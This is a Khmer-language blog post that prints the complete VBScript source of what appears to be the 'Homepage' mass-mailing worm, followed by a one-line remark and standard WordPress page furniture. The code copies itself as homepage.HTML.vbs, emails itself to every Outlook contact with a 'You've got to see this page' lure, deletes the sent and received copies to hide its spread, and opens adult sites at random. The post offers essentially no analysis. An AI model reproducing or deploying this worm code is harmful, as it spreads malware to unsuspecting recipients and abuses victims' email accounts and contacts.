កូដមេរោគស្អីគេអីចេះ? (កូដទី១)


On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
 Set Mapi=Outlook.GetNameSpace("MAPI")
 Set Lists=Mapi.AddressLists
 For Each ListIndex In Lists
 If ListIndex.AddressEntries.Count <> 0 Then
  ContactCount = ListIndex.AddressEntries.Count
  For Count= 1 To ContactCount
  Set Mail = Outlook.CreateItem(0)
  Set Contact = ListIndex.AddressEntries(Count)
  Mail.To = Contact.Address
  Mail.Subject = "Homepage"
  Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
  Set Attachment=Mail.Attachments
  Attachment.Add Folder & "\homepage.HTML.vbs"
  Mail.DeleteAfterSubmit = True
  If Mail.To <> "" Then
  Mail.Send
  WS.regwrite "HKCU\software\An\mailed", "1"
  End If
  Next
 End If
 Next
End if
End Function

មើលអត់យល់ ពេលដែលយល់គឺមេរោគចូលបាត់
Advertisements

About Nataro

ក្នុងលោក គ្មានអ្វីដែលល្អគ្រប់ដប់នោះទេ
This entry was posted in កុំព្យូទ័រ, ចំនេះដឹង and tagged , , . Bookmark the permalink.

ឆ្លើយ​តប

Fill in your details below or click an icon to log in:

ឡូហ្កូ WordPress.com

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី WordPress.com របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

រូប Twitter

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Twitter របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

រូបថត Facebook

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Facebook របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

Google+ photo

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Google+ របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

កំពុង​ភ្ជាប់​ទៅ​កាន់ %s